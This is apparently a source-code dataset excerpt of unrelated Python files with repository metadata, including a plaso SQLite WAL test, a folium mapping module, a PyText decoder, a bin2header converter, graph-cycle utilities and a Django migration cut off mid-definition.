cache = sqlite.SQLiteCache()
# Test matching schema.
storage_writer = self._ParseDatabaseFileWithPlugin(
[u'wal_database.db'], plugin_object, cache=cache)
self.assertTrue(storage_writer.events)
for event in storage_writer.events:
self.assertTrue(event.schema_match)
# Test schema change with WAL.
wal_file = self._GetTestFilePath([u'wal_database.db-wal'])
storage_writer = self._ParseDatabaseFileWithPlugin(
[u'wal_database.db'], plugin_object, cache=cache, wal_path=wal_file)
self.assertTrue(storage_writer.events)
for event in storage_writer.events:
if event.from_wal:
self.assertFalse(event.schema_match)
else:
self.assertTrue(event.schema_match)
# Add schema change from WAL file and test again.
plugin_object.SCHEMAS.append(
{u'MyTable':
u'CREATE TABLE "MyTable" ( `Field1` TEXT, `Field2` INTEGER, `Field3` '
u'BLOB , NewField TEXT)',
u'NewTable':
u'CREATE TABLE NewTable(NewTableField1 TEXT, NewTableField2 TEXT)'})
storage_writer = self._ParseDatabaseFileWithPlugin(
[u'wal_database.db'], plugin_object, cache=cache, wal_path=wal_file)
self.assertTrue(storage_writer.events)
for event in storage_writer.events:
self.assertTrue(event.schema_match)
# Test without original schema.
del plugin_object.SCHEMAS[0]
storage_writer = self._ParseDatabaseFileWithPlugin(
[u'wal_database.db'], plugin_object, cache=cache, wal_path=wal_file)
self.assertTrue(storage_writer.events)
for event in storage_writer.events:
if event.from_wal:
self.assertTrue(event.schema_match)
else:
self.assertFalse(event.schema_match)
if __name__ == '__main__':
unittest.main()
|
[
"joachim.metz@gmail.com"
] |
joachim.metz@gmail.com
|
8e057d2ce2408c7882a9090ddf70294e23500b13
|
65a32b8a8a97c126843d2cfe79c43193ac2abc23
|
/chapter16/fib_test_2.py
|
c722f4d40ff1ba55c39a6f1db4cb394a86e1710c
|
[] |
no_license
|
zhuyuedlut/advanced_programming
|
9af2d6144e247168e492ddfb9af5d4a5667227c4
|
a6e0456dd0b216b96829b5c3cef11df706525867
|
refs/heads/master
| 2023-03-19T09:21:31.234000
| 2020-10-09T13:09:38
| 2020-10-09T13:09:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 484
|
py
|
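# Memoization demo: the decorator below caches each fib(x) result, so the
# naive exponential recursion collapses to O(n) distinct calls; the cProfile
# run at the bottom makes the saving visible.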
def memoize(f):
memo = {}
def helper(x):
if x not in memo:
memo[x] = f(x)
return memo[x]
return helper
@memoize
def fib(n):
if n == 0:
return 0
elif n == 1:
return 1
else:
return fib(n-1) + fib(n-2)
def fib_seq(n):
res = []
if n > 0:
res.extend(fib_seq(n-1))
res.append(fib(n))
return res
if __name__ == "__main__":
fib_seq(30)
import cProfile
cProfile.run('fib_seq(30)')
|
[
"root@lyzdeMacBook.local"
] |
root@lyzdeMacBook.local
|
94f28c8e8785258f7272399beffdb289c6c802c0
|
035f7cbf8a16d2936b3df13c3966e954c6b6a13a
|
/lab/soc_module.py
|
e91f1b4bcb8ea1ab10d5cadb5d859c11f9bb6aed
|
[
"BSD-3-Clause"
] |
permissive
|
2i2c-org/utoronto-demo
|
84d043b446f4c8ed5f5375175ac482deba8c2955
|
8e2cd4a9f04e3399bc2437e95975c80f5899cef1
|
refs/heads/master
| 2022-11-13T11:12:33.333581
| 2020-07-07T17:00:24
| 2020-07-07T17:00:24
| 277,604,065
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,475
|
py
|
import pandas as pd
import os
import folium
import folium.plugins
import geojson
import random
import numpy as np
from sklearn import preprocessing
import re
from geopy.geocoders import Nominatim
import time
import certifi
import ssl
import geopy.geocoders
# ctx = ssl.create_default_context(cafile=certifi.where())
# geopy.geocoders.options.default_ssl_context = ctx
def html_popup(title, comment, imgpath, data):
"""Format the image data into html.
:params title, comment, imgpath, data: strings"""
html = """
<h3>TITLE</h3>
<img
src = IMGPATH
style="width:180px;height:128px;"
>
<p>
"COMMENT"
</p>
<p>
DATA
</p>
"""
html = html.replace(
"TITLE",
title).replace(
"COMMENT",
comment).replace(
"IMGPATH",
imgpath).replace(
"DATA",
data)
return html
def fix_tract(t):
"""Clean up census tract names.
    :param t: a single tract name (string or numeric)
    :returns: the cleaned tract name as a string
"""
if type(t) == str:
return t
return str(t).rstrip("0").rstrip(".")
def get_coords(data, alameda, user_agent):
"""Get the geographical coordinates (latitude and longitude) of a
list of street addresses.
:param data: DataFrame with student responses from Google form
:param alameda: GeoJSON data for Alameda county
:user_agent: string user agent for OpenStreetMap
:returns: "data" dataframe with appended column of coordinates
"""
tracts = folium.features.GeoJson(alameda)
tract_centroids = get_centroids(alameda)
data['Census Tract'] = data['Census Tract'].apply(fix_tract)
for j in np.arange(1, 6):
image_coords = []
for i, row in data.iterrows():
tract = row['Census Tract']
if not pd.isnull(row['Full Address of Block Face in Image #' + str(j) + ' (Street Number, Street Name, City, State, Zip Code). E.g.: 2128 Oxford Street, Berkeley, CA, 94704.']):
address = row['Full Address of Block Face in Image #' + str(j) + ' (Street Number, Street Name, City, State, Zip Code). E.g.: 2128 Oxford Street, Berkeley, CA, 94704.']
geocoder = Nominatim(user_agent=user_agent, timeout=3)
loc = geocoder.geocode(address)
if loc is None :
if len(tract) == 3:
tract += "0"
coords = tract_centroids[tract]
else:
coords = [loc.latitude, loc.longitude]
image_coords.append(coords)
elif not pd.isnull(row['Image #' + str(j)]):
image_coords.append(tract_centroids[tract])
else:
image_coords.append('NaN')
time.sleep(0.5)
data['Image #' + str(j)+ ' coordinates'] = image_coords
return data
def get_centroids(geojson):
"""Get census tract centroids.
:param geojson: a GeoJSON file with census tract location data
:returns: a dictionary with tract names mapped to coordinate tuples"""
tract_centroids = {}
for t in geojson['features']:
lat = t['properties']['intptlat10']
lon = t['properties']['intptlon10']
name = t['properties']['name10']
tract_centroids[name] = (float(lat), float(lon))
return tract_centroids
def map_data(myMap, alameda, obs_data):
"""Map student observations.
:param myMap: Folium Map object
:param alameda: GeoJSON of alameda county census tracts
:param obs_data: DataFrame image addresses and coordinates
:returns: Folium Map object with markers for student data
"""
# add tract outlines
tracts = folium.features.GeoJson(alameda)
tract_centroids = get_centroids(alameda)
myMap.add_child(tracts)
# transfer Table to pandas
obs_data = obs_data.to_df()
    for t in set(obs_data['Census Tract']):
subset = obs_data[obs_data['Census Tract'] == t]
markers = []
popups = []
for i, row in subset.iterrows():
for j in np.arange(1, 6):
if not pd.isnull(row['Image #' + str(j)]):
try:
image_url = row['Image #' + str(j)].replace(
"open?", "uc?export=download&")
except:
image_url = "NA"
coords = [float(coords) for coords in re.findall('-?[0-9]+.[0-9]+', row['Image #' + str(j) + ' coordinates'])]
# if there aren't coords of format [lat, lon] the loop skips this iteration
if len(coords) != 2:
continue
tract = str(row['Census Tract'])
comment = row["Other thoughts or comments for Image #" + str(j)]
if not isinstance(comment, str):
comment = "NA"
data = np.mean([row[i] for i in range(5, 14)
if type(row[i]) in [int, float]])
html = html_popup(
title="Tract: " + tract,
comment=comment,
imgpath=image_url,
data="")
popup = folium.Popup(
folium.IFrame(
html=html,
width=200,
height=300),
max_width=2650
)
markers += [coords]
popups += [popup]
marker_cluster = folium.plugins.MarkerCluster(locations=markers, popups=popups).add_to(myMap)
return myMap
def minmax_scale(x):
"""Scales values in array to range (0, 1)
:param x: array of values to scale
"""
if min(x) == max(x):
return x * 0
return (x - min(x)) / (max(x) - min(x))
def scale_values(tbl, columns):
"""Scale values in a dataframe using MinMax scaling.
:param tbl: Table
:param columns: iterable with names of columns to be scaled
:returns: Table with scaled columns
"""
new_tbl = tbl.copy()
for col in columns:
name = new_tbl.labels[col]
x_scaled = minmax_scale(new_tbl[name])
new_tbl[name] = x_scaled
return new_tbl
# NO LONGER USED as of Fall 2018
def choropleth_overlay(mapa, column_name, joined, alameda):
"""Add a choropleth overlay to a map.
:param mapa: Folium Map object
:param column_name: string column name with data to overlay
:param joined:
:param alameda: GeoJSON Alameda county census tract data
:returns: mapa with a chloropleth overlay
"""
# add tract outlines
tracts = folium.features.GeoJson(alameda)
tract_centroids = get_centroids(alameda)
mapa.add_child(tracts)
threshold_scale = np.linspace(
joined[column_name].min(),
joined[column_name].max(),
6,
dtype=float).tolist()
mapa = folium.Map(location=(37.8044, -122.2711), zoom_start=11)
mapa.choropleth(geo_data=alameda,
data=joined,
columns=['Census Tract', column_name],
fill_color='YlOrRd',
key_on='feature.properties.name10',
threshold_scale=threshold_scale)
return mapa
|
[
"choldgraf@berkeley.edu"
] |
choldgraf@berkeley.edu
|
78c4520f26fc5a405e8b5516a71476aa9983b266
|
61f9c7094be028e040d1234f05ee6d7370c2206d
|
/pytext/models/decoders/mlp_decoder_n_tower.py
|
6e2e0c6810eef0ce327e48063f8f785200ccca9b
|
[
"BSD-3-Clause"
] |
permissive
|
timgates42/pytext
|
3ce5473fecca5174108a4eb63209a3eecfb6d8dd
|
5f2c3ca6c3ba56e1001e95825abd7ee295de1dff
|
refs/heads/main
| 2023-03-15T07:33:21.217159
| 2022-07-11T16:06:16
| 2022-07-11T16:06:16
| 231,028,915
| 0
| 0
|
NOASSERTION
| 2019-12-31T05:04:01
| 2019-12-31T05:04:00
| null |
UTF-8
|
Python
| false
| false
| 3,970
|
py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
from typing import List
import torch
import torch.nn as nn
from pytext.config.module_config import Activation
from pytext.models.decoders.decoder_base import DecoderBase
from pytext.optimizer import get_activation
from pytext.utils import precision
from pytext.utils.usage import log_class_usage
# Export types are now ints
# -1 represents ExportType.None
# eg: to export from tower 0, set your export type to 0
#
class MLPDecoderNTower(DecoderBase):
"""
Implements an 'n-tower' MLPDecoder
"""
class Config(DecoderBase.Config):
# Intermediate hidden dimensions
tower_specific_hidden_dims: List[List[int]] = []
hidden_dims: List[int] = []
layer_norm: bool = False
dropout: float = 0.0
activation: Activation = Activation.RELU
def __init__(
self,
config: Config,
tower_dims: List[int],
to_dim: int,
export_type=-1,
) -> None:
super().__init__(config)
for i in range(len(tower_dims)):
setattr(
self,
f"tower_mlp_{i}",
MLPDecoderNTower.get_mlp(
tower_dims[i],
0,
config.tower_specific_hidden_dims[i],
config.layer_norm,
config.dropout,
config.activation,
export_embedding=True,
),
)
from_dim = 0
for dims in config.tower_specific_hidden_dims:
from_dim += dims[-1]
self.mlp = MLPDecoderNTower.get_mlp(
from_dim,
to_dim,
config.hidden_dims,
config.layer_norm,
config.dropout,
config.activation,
)
        self.out_dim = to_dim
        self.export_type = export_type
        # Retained for get_decoder(); the config object itself is not kept.
        self.tower_specific_hidden_dims = config.tower_specific_hidden_dims
        log_class_usage(__class__)
@staticmethod
def get_mlp(
from_dim: int,
to_dim: int,
hidden_dims: List[int],
layer_norm: bool,
dropout: float,
activation: Activation,
export_embedding: bool = False,
):
layers = []
for i in range(len(hidden_dims)):
dim = hidden_dims[i]
layers.append(nn.Linear(from_dim, dim, True))
# Skip ReLU, LayerNorm, and dropout for the last layer if export_embedding
if not (export_embedding and i == len(hidden_dims) - 1):
layers.append(get_activation(activation))
if layer_norm:
layers.append(nn.LayerNorm(dim))
if dropout > 0:
layers.append(nn.Dropout(dropout))
from_dim = dim
if to_dim > 0:
layers.append(nn.Linear(from_dim, to_dim, True))
return nn.Sequential(*layers)
def forward(self, *x: List[torch.Tensor]) -> torch.Tensor:
# as per the associated model's arrange_model_inputs()
# first half of the list is the token inputs, the second half is the dense features
halfway = len(x) // 2
outputs = []
for i in range(halfway):
if self.export_type == i or self.export_type == -1:
tensor = (
torch.cat((x[i], x[halfway + i]), 1).half()
if precision.FP16_ENABLED
else torch.cat((x[i], x[halfway + i]), 1).float()
)
# len(tensor i) == i's encoder.embedding_dim + i's dense_dim
output = getattr(self, f"tower_mlp_{i}")(tensor)
outputs.append(output)
if self.export_type == i:
return output
return self.mlp(torch.cat(outputs, 1))
def get_decoder(self) -> List[nn.Module]:
return [
getattr(self, f"tower_mlp_{i}")
for i in range(len(self.tower_specific_hidden_dims))
]
|
[
"facebook-github-bot@users.noreply.github.com"
] |
facebook-github-bot@users.noreply.github.com
|
3574d97da998084641fea6ef4eeadcf842506678
|
0682577346d5be6452f93e17cf06df70acb95135
|
/src/bin2header.py
|
4755e84c32cb3efc4ebf88c35ecbf0cdd727554f
|
[
"MIT"
] |
permissive
|
cenit/bin2header
|
c8bf30cf371378a7f31c4eef37ffbe228fa41638
|
9860f292a0a109a1b999dd3cafe07fdb952a1e18
|
refs/heads/dev/msvc
| 2023-04-18T02:12:04.133748
| 2021-03-24T19:22:18
| 2021-03-24T20:59:12
| 340,431,411
| 0
| 0
|
MIT
| 2021-05-02T08:15:26
| 2021-02-19T16:47:07
|
C++
|
UTF-8
|
Python
| false
| false
| 3,545
|
py
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright © 2019 Jordan Irwin (AntumDeluge) <antumdeluge@gmail.com>
#
# This file is part of the bin2header project & is distributed under the
# terms of the MIT/X11 license. See: LICENSE.txt
import sys, os, array
if sys.version_info.major < 3:
print('\nERROR: Python ' + str(sys.version_info.major) + ' not supported. Please upgrade to Python 3.\n')
sys.exit(2)
__WIN32__ = 'windows' in (os.getenv('OS') or '').lower()
version = '0.1.2'
## Normalizes the path for the current system
def NormalizePath(path):
new_path = path
to_replace = '\\'
replace_with = '/'
if __WIN32__:
to_replace = '/'
replace_with = '\\'
new_path = new_path.replace(to_replace, replace_with)
if __WIN32__:
# MSYS2/MinGW paths
if new_path.lower().startswith('\\c\\'):
new_path = 'C:{}'.format(new_path[2:])
	return new_path
def GetBaseName(f):
base_name = os.path.basename(f)
# MSYS versions of Python appear to not understand Windows paths
if __WIN32__ and '\\' in base_name:
base_name = base_name.split('\\')[-1]
return base_name
def GetDirName(f):
dir_name = os.path.dirname(f)
# MSYS versions of Python appear to not understand Windows paths
if not dir_name and __WIN32__:
dir_name = '\\'.join(f.split('\\')[:-1])
return dir_name
def PrintUsage():
executable = os.path.basename(__file__)
print('\nbin2header version {} (Python)\nCopyright © 2019 Jordan Irwin <antumdeluge@gmail.com>\n\n\tUsage:\t{} <file>\n'.format(version, executable))
def main(argv):
source_file = NormalizePath(argv[1])
# Check if file exists
if not os.path.isfile(source_file):
print('\nFile "{}" does not exist'.format(source_file))
PrintUsage()
sys.exit(1)
### Get filenames and target directory ###
filename = list(GetBaseName(source_file))
hname = list(filename)
target_dir = GetDirName(source_file)
### Remove Unwanted Characters ###
badchars = ('\\', '+', '-', '*', ' ')
for x in range(len(hname)):
if hname[x] in badchars or hname[x] == '.':
hname[x] = '_'
if filename[x] in badchars:
filename[x] = '_'
filename = ''.join(filename)
hname = ''.join(hname)
target_file = os.path.join(target_dir, filename) + '.h'
### Uppercase Name for Header ###
hname_upper = hname.upper()
hname_upper += '_H'
### Read Data In ###
data = array.array('B', open(source_file, 'rb').read())
### START Read Data Out to Header ###
# adds C++ std::vector support
# TODO: make optional
store_vector = True
	# currently only LF line endings are supported for output
outfile = open(target_file, 'w', newline='\n')
text = '#ifndef {0}\n#define {0}\n'.format(hname_upper)
if store_vector:
text += '\n#ifdef __cplusplus\n#include <vector>\n#endif\n'
text += '\nstatic const unsigned char {}[] = {{\n'.format(hname)
current = 0
data_length = len(data)
for byte in data:
if (current % 12) == 0:
text += ' '
text += '0x%02x' % byte
if (current + 1) < data_length:
text += ', '
if (current % 12) == 11:
text += '\n'
current += 1
text += '\n};\n'
if store_vector:
text += '\n#ifdef __cplusplus\nstatic const std::vector<char> ' \
+ hname + '_v(' + hname + ', ' + hname + ' + sizeof(' + hname \
+ '));\n#endif\n'
text +='\n#endif /* {} */\n'.format(hname_upper)
outfile.write(text)
outfile.close()
### END Read Data Out to Header ###
print('Exported to: {}'.format(target_file))
return 0
if __name__ == '__main__':
if len(sys.argv) < 2:
print('\nERROR: Missing <file> argument')
PrintUsage()
sys.exit(1)
main(sys.argv)
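# Example invocation (illustrative; the input file name is a placeholder):
#   $ python bin2header.py logo.png
#   Exported to: logo.png.h
# The generated header declares:
#   static const unsigned char logo_png[] = { ... };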
|
[
"antumdeluge@gmail.com"
] |
antumdeluge@gmail.com
|
021380e13d2eae318fc3807aa19a45be981051fb
|
e20ed90b9be7a0bcdc1603929d65b2375a224bf6
|
/generated-libraries/python/netapp/lun/lun_stats_get_iter_key_td.py
|
b900171ae83a9786718d2f883283ee90bf322dc9
|
[
"MIT"
] |
permissive
|
radekg/netapp-ontap-lib-gen
|
530ec3248cff5ead37dc2aa47ced300b7585361b
|
6445ebb071ec147ea82a486fbe9f094c56c5c40d
|
refs/heads/master
| 2016-09-06T17:41:23.263133
| 2015-01-14T17:40:46
| 2015-01-14T17:40:46
| 29,256,898
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,238
|
py
|
from netapp.netapp_object import NetAppObject
class LunStatsGetIterKeyTd(NetAppObject):
"""
Key typedef for table lunStats
"""
_key_3 = None
@property
def key_3(self):
"""
Field qtree
"""
return self._key_3
@key_3.setter
def key_3(self, val):
if val != None:
self.validate('key_3', val)
self._key_3 = val
_key_2 = None
@property
def key_2(self):
"""
Field volume
"""
return self._key_2
@key_2.setter
def key_2(self, val):
if val != None:
self.validate('key_2', val)
self._key_2 = val
_key_1 = None
@property
def key_1(self):
"""
Field path
"""
return self._key_1
@key_1.setter
def key_1(self, val):
if val != None:
self.validate('key_1', val)
self._key_1 = val
_key_0 = None
@property
def key_0(self):
"""
Field vserver
"""
return self._key_0
@key_0.setter
def key_0(self, val):
if val != None:
self.validate('key_0', val)
self._key_0 = val
_key_4 = None
@property
def key_4(self):
"""
Field lun
"""
return self._key_4
@key_4.setter
def key_4(self, val):
if val != None:
self.validate('key_4', val)
self._key_4 = val
@staticmethod
def get_api_name():
return "lun-stats-get-iter-key-td"
@staticmethod
def get_desired_attrs():
return [
'key-3',
'key-2',
'key-1',
'key-0',
'key-4',
]
def describe_properties(self):
return {
'key_3': { 'class': basestring, 'is_list': False, 'required': 'optional' },
'key_2': { 'class': basestring, 'is_list': False, 'required': 'optional' },
'key_1': { 'class': basestring, 'is_list': False, 'required': 'optional' },
'key_0': { 'class': basestring, 'is_list': False, 'required': 'optional' },
'key_4': { 'class': basestring, 'is_list': False, 'required': 'optional' },
}
|
[
"radek@gruchalski.com"
] |
radek@gruchalski.com
|
6080e8e27370523a1a15d482bd31e6589aa63cc2
|
1c5f4a13a5d67201b3a21c6e61392be2d9071f86
|
/.VirtualEnv/Lib/site-packages/influxdb_client/domain/variable_assignment.py
|
f36ac8c683bd2b04ca15fcea617fca76518bfe9c
|
[] |
no_license
|
ArmenFirman/FastAPI-InfluxDB
|
19e3867c2ec5657a9428a05ca98818ca7fde5fd0
|
b815509c89b5420f72abf514562e7f46dcd65436
|
refs/heads/main
| 2023-06-24T20:55:08.361089
| 2021-07-29T00:11:18
| 2021-07-29T00:11:18
| 390,462,832
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,256
|
py
|
# coding: utf-8
"""
Influx OSS API Service.
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
OpenAPI spec version: 2.0.0
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from influxdb_client.domain.statement import Statement
class VariableAssignment(Statement):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'type': 'str',
'id': 'Identifier',
'init': 'Expression'
}
attribute_map = {
'type': 'type',
'id': 'id',
'init': 'init'
}
def __init__(self, type=None, id=None, init=None): # noqa: E501,D401,D403
"""VariableAssignment - a model defined in OpenAPI.""" # noqa: E501
Statement.__init__(self) # noqa: E501
self._type = None
self._id = None
self._init = None
self.discriminator = None
if type is not None:
self.type = type
if id is not None:
self.id = id
if init is not None:
self.init = init
@property
def type(self):
"""Get the type of this VariableAssignment.
Type of AST node
:return: The type of this VariableAssignment.
:rtype: str
""" # noqa: E501
return self._type
@type.setter
def type(self, type):
"""Set the type of this VariableAssignment.
Type of AST node
:param type: The type of this VariableAssignment.
:type: str
""" # noqa: E501
self._type = type
@property
def id(self):
"""Get the id of this VariableAssignment.
:return: The id of this VariableAssignment.
:rtype: Identifier
""" # noqa: E501
return self._id
@id.setter
def id(self, id):
"""Set the id of this VariableAssignment.
:param id: The id of this VariableAssignment.
:type: Identifier
""" # noqa: E501
self._id = id
@property
def init(self):
"""Get the init of this VariableAssignment.
:return: The init of this VariableAssignment.
:rtype: Expression
""" # noqa: E501
return self._init
@init.setter
def init(self, init):
"""Set the init of this VariableAssignment.
:param init: The init of this VariableAssignment.
:type: Expression
""" # noqa: E501
self._init = init
def to_dict(self):
"""Return the model properties as a dict."""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Return the string representation of the model."""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`."""
return self.to_str()
def __eq__(self, other):
"""Return true if both objects are equal."""
if not isinstance(other, VariableAssignment):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Return true if both objects are not equal."""
return not self == other
|
[
"42990136+ArmenFirman@users.noreply.github.com"
] |
42990136+ArmenFirman@users.noreply.github.com
|
5137a2d0697ff6d46bc41528064261cdc36a3fcc
|
6a2a4f97009e31e53340f1b4408e775f3051e498
|
/Iniciante/p2031.py
|
89cb880da36fcb459e803f82f4d976c547bff06d
|
[] |
no_license
|
rafacasa/OnlineJudgePythonCodes
|
34c31f325cccb325f074492b40591ad880175816
|
030c18f9020898fdc4f672f9cc17723236e1271d
|
refs/heads/master
| 2023-07-15T12:09:45.534873
| 2023-06-27T00:24:03
| 2023-06-27T00:24:03
| 250,595,994
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 710
|
py
|
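# beecrowd/URI 2031 (Rock, Paper, Airstrike): "ataque" beats both "pedra" and
# "papel"; two airstrikes annihilate each other, two rocks draw, two papers
# "both win", and rock beats paper.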
qtd = int(input())
for i in range(qtd):
j1 = input()
j2 = input()
if j1 == 'ataque':
if j2 == 'ataque':
print('Aniquilacao mutua')
continue
else:
print('Jogador 1 venceu')
continue
if j1 == 'pedra':
if j2 == 'ataque':
print('Jogador 2 venceu')
continue
if j2 == 'pedra':
print('Sem ganhador')
continue
if j2 == 'papel':
print('Jogador 1 venceu')
continue
if j1 == 'papel':
if j2 == 'papel':
print('Ambos venceram')
continue
else:
print('Jogador 2 venceu')
continue
|
[
"rafaelluizcasa@gmail.com"
] |
rafaelluizcasa@gmail.com
|
c945c8268924f58b87f20e45705848eca360c58a
|
59a688e68421794af64bfe69a74f64b2c80cd79d
|
/graph_theory/utils_graph_theory.py
|
fd125946005681bf4598d211b4d0027d1ecc27c5
|
[] |
no_license
|
hearues-zueke-github/python_programs
|
f23469b306e057512aadecad0ca0a02705667a15
|
d24f04ca143aa93f172210a4b9dfdd9bf1b79a15
|
refs/heads/master
| 2023-07-26T00:36:56.512635
| 2023-07-17T12:35:16
| 2023-07-17T12:35:16
| 117,093,746
| 6
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,290
|
py
|
import numpy as np
# cycle detection in a functional graph (each node has exactly one outgoing edge)
def get_cycles_of_1_directed_graph(l_edges_directed):
nodes_from, nodes_to = list(zip(*l_edges_directed))
all_nodes = sorted(set(nodes_from+nodes_to))
unique_nodes_from, counts = np.unique(nodes_from, return_counts=True)
assert np.all(counts==1)
edges_directed_dict = {n1: n2 for n1, n2 in l_edges_directed}
all_available_nodes = set(all_nodes)
list_of_cycles = []
while len(all_available_nodes) > 0:
node_now = all_available_nodes.pop()
lst_nodes = [node_now]
is_found_cycle = False
while True:
node_next = edges_directed_dict[node_now]
node_now = node_next
if not node_next in all_available_nodes:
if node_next in lst_nodes:
lst_nodes = lst_nodes[lst_nodes.index(node_next):]
argmin = np.argmin(lst_nodes)
lst_nodes = lst_nodes[argmin:]+lst_nodes[:argmin]
is_found_cycle = True
break
lst_nodes.append(node_next)
all_available_nodes.remove(node_next)
if is_found_cycle:
list_of_cycles.append(lst_nodes)
list_of_cycles_sorted = sorted(list_of_cycles, key=lambda x: (len(x), x))
return list_of_cycles_sorted
def write_digraph_as_dotfile(path, arr_x, arr_y):
with open(path, 'w') as f:
f.write('digraph {\n')
for x in arr_x:
f.write(f' x{x}[label="{x}"];\n')
f.write('\n')
for x, y in zip(arr_x, arr_y):
f.write(f' x{x} -> x{y};\n')
f.write('}\n')
# d_node_pair_edge = {(0, 1): 2, ...}
# Node 0 to Node 1 with the Edge 2, etc.
# def write_many_digraph_as_dotfile(path, node_from, node_to):
def write_many_digraph_edges_as_dotfile(path, d_node_pair_edge):
with open(path, 'w') as f:
f.write('digraph {\n')
for x in sorted(set(list(map(lambda x: x[0], d_node_pair_edge.keys())))):
f.write(f' x{x}[label="{x}"];\n')
f.write('\n')
for (n1, n2), e in d_node_pair_edge.items():
# for x, y in zip(node_from, node_to):
f.write(f' x{n1} -> x{n2} [label="{e}"];\n')
# f.write(f' x{x} -> x{y} [label="{e}"];\n')
f.write('}\n')
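# Minimal usage sketch (assumes, as the function asserts, that every node has
# exactly one outgoing edge):
if __name__ == '__main__':
    edges = [(0, 1), (1, 2), (2, 0), (3, 3)]
    print(get_cycles_of_1_directed_graph(edges))  # -> [[3], [0, 1, 2]]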
|
[
"hziko314@gmail.com"
] |
hziko314@gmail.com
|
61987d03b4832d555efd81438653636012699b92
|
4da9c19d9839c670fda30a45a7e223da624eee4a
|
/Codechef Problem solutions/lapindromes.py
|
9070865b0cf0bb49ceaf98a28dcc869c6166e819
|
[] |
no_license
|
JineshKamdar98/Codchef-Problem-Solutions
|
3e1737669cc0657ccc224e06f800b587130f5787
|
4447679aa3fb45a2d57f93bf3f724f6223049506
|
refs/heads/master
| 2020-05-05T06:38:10.306619
| 2019-04-06T06:16:10
| 2019-04-06T06:16:10
| 179,795,902
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 197
|
py
|
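# CodeChef LAPIN: a string is a lapindrome when its two halves (middle
# character ignored for odd lengths) contain the same characters with the
# same frequencies - hence the sorted-halves comparison below.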
t=int(input())
while(t!=0):
s=input()
p=list(s[:len(s)//2])
q=list(s[-(len(s)//2):])
if(sorted(p)==sorted(q)):
print('YES')
else:
print('NO')
t-=1
|
[
"noreply@github.com"
] |
JineshKamdar98.noreply@github.com
|
111dbc26616d818e6e15afdd77e8e66d50541599
|
4bd5e9b67d98bfcc9611bd8b774c9ab9f4f4d446
|
/Python基础笔记/12/代码/1.类的定义.py
|
611f8b67880c998961906ccb1093d893e099e0c3
|
[] |
no_license
|
zhenguo96/test1
|
fe21510aea7feb674e52fd7a86d4177666f841c5
|
0d8de7e73e7e635d26462a0bc53c773d999498be
|
refs/heads/master
| 2020-05-03T13:09:53.592103
| 2019-04-06T07:08:47
| 2019-04-06T07:08:47
| 178,646,627
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,325
|
py
|
"""
类:人
属性(静态特征):
姓名
性别
年龄
行为(动态特征):
吃饭
睡觉
打豆豆
"""
"""
1.类名命名规范:
数字、字符、下划线组成、不能以数字开头
不能是保留字
区分大小写
2.命名风格:大驼峰:每个单词首字母大写
3.类体:以冒号开头,必须缩进
"""
class Person:
# 构造方法
"""
方法和函数的区别: 方法第一个参数必须是self,函数没有self
方法定义在类中,作用域属于类,可以和函数重名
方法必须通过对象调用 对象.方法()
"""
def __init__(self):
# 成员属性定义在构造函数中
# self.属性名 = 属性值
self.name = '我'
self.age = 5
self.sex = '男'
# 行为:
def eat(self):
print("吃饭")
def sleepiing(self):
print("睡觉")
def da_doudou(self):
print("打豆豆")
# 实例化对象:类名()
doudou = Person()
print(doudou,type(doudou))
# 调用属性:对象.属性
print(doudou.name,doudou.age)
# 调用方法:对象.方法()
doudou.eat()
doudou.sleepiing()
doudou.da_doudou()
|
[
"1148421588@qq.com"
] |
1148421588@qq.com
|
bfdc184ec6e550e1526742ddaa73ce54cdbabee9
|
b509b4c3ba811ee5cbbc8ae5a580c78dc66c3437
|
/backend/vehicle/migrations/0001_initial.py
|
d442d5d68a3d15410380299dcfa2ac14cffe213f
|
[] |
no_license
|
crowdbotics-apps/application-24933
|
d0a35800eee010daebae321e321e9f906cbc2e4a
|
dadd878c63f6d74f4f57d9a04eec818d77ba3595
|
refs/heads/master
| 2023-03-13T22:34:01.776842
| 2021-03-09T16:02:32
| 2021-03-09T16:02:32
| 346,061,385
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,549
|
py
|
# Generated by Django 2.2.19 on 2021-03-09 16:00
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('taxi_profile', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='VehicleType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('icon', models.URLField()),
('base_rate', models.FloatField()),
],
),
migrations.CreateModel(
name='Vehicle',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('type_description', models.CharField(max_length=255)),
('plate_number', models.CharField(max_length=10)),
('timestamp_registered', models.DateTimeField(auto_now_add=True)),
('is_on_duty', models.BooleanField(blank=True, null=True)),
